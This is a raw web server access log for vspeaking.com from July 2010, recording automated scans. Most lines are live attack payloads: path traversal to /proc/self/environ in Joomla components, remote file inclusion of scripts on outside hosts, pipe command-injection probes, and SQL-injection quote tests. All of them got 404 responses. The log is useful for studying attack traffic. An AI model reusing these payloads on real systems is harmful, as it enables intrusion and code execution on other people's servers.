70.86.235.162 - - [26/Jul/2010:09:47:16 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:09:47:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:09:47:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:47:21 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:47:21 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:47:22 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:49:54 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:49:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:49:55 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:09:52:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:53:02 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:53:02 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:53:02 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:56:30 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:56:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:56:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:57:53 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:57:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:57:54 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:58:12 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:58:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:58:13 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:59:18 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:59:18 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:59:18 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:10:01:34 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:10:01:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:10:01:35 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:01:49 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:01:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:01:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:06:54 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:06:54 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:06:54 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:06:55 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:06:55 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:06:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:11:14 -0700] "POST /logs/access_100719.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:11:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:11:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:11:41 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:11:41 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:11:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:11:41 -0700] "GET /logs/access_100607.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:11:41 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:11:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:10:12:24 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:10:12:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:10:12:24 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
74.55.73.74 - - [26/Jul/2010:10:14:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:14:46 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:14:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:14:47 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:15:03 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:15:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:15:04 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
79.87.14.150 - - [26/Jul/2010:10:15:07 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://wang.es/c100.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:10:20:42 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:26:44 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:26:44 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:26:44 -0700] "GET /index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:26:45 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:26:45 -0700] "GET /index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:26:45 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "vspeaking.com"
99.198.108.74 - - [26/Jul/2010:10:32:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:32:39 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:33:02 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:33:26 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
74.55.73.74 - - [26/Jul/2010:10:33:57 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
74.55.73.74 - - [26/Jul/2010:10:33:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
74.55.73.74 - - [26/Jul/2010:10:33:58 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
208.80.193.121 - - [26/Jul/2010:10:36:05 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; HbTools 4.7.1)" "vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:36:16 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:36:16 -0700] "GET /logs/access.log//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:36:16 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:36:17 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:36:17 -0700] "GET /logs/access.log//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:36:17 -0700] "GET /index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:36:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
99.198.108.74 - - [26/Jul/2010:10:39:24 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
99.198.108.74 - - [26/Jul/2010:10:39:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
99.198.108.74 - - [26/Jul/2010:10:39:24 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:39:30 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:39:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:39:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:47:16 -0700] "GET /logs/access.log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:47:16 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:47:16 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:47:16 -0700] "GET /logs/access.log%20%20//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:47:17 -0700] "GET /index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:10:47:17 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
83.93.131.189 - - [26/Jul/2010:10:48:30 -0700] "GET /logs/access.log//index.php?option=com_comprofiler&mosConfig.absolute.path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
83.93.131.189 - - [26/Jul/2010:10:48:31 -0700] "GET /index.php?option=com_comprofiler&mosConfig.absolute.path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
83.93.131.189 - - [26/Jul/2010:10:48:31 -0700] "GET /logs//index.php?option=com_comprofiler&mosConfig.absolute.path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:48:59 -0700] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:10:48:59 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:59:24 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:59:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:10:59:24 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
217.16.18.219 - - [26/Jul/2010:11:00:56 -0700] "GET /logs/access.log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
217.16.18.219 - - [26/Jul/2010:11:00:57 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
217.16.18.219 - - [26/Jul/2010:11:00:57 -0700] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
222.124.193.12 - - [26/Jul/2010:11:08:28 -0700] "GET /sunshop/index.inc.php?ID=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
222.124.193.12 - - [26/Jul/2010:11:08:28 -0700] "GET /sunshop/index.inc.php?ID=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
222.124.193.12 - - [26/Jul/2010:11:13:06 -0700] "GET /logs/scripts.log//sunshop/index.inc.php?ID=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
174.121.241.255 - - [26/Jul/2010:11:13:08 -0700] "GET /index2.inc.php?ID=' HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
222.124.193.12 - - [26/Jul/2010:11:13:08 -0700] "GET /sunshop/index.inc.php?ID=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
222.124.193.12 - - [26/Jul/2010:11:13:09 -0700] "GET /logs//sunshop/index.inc.php?ID=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
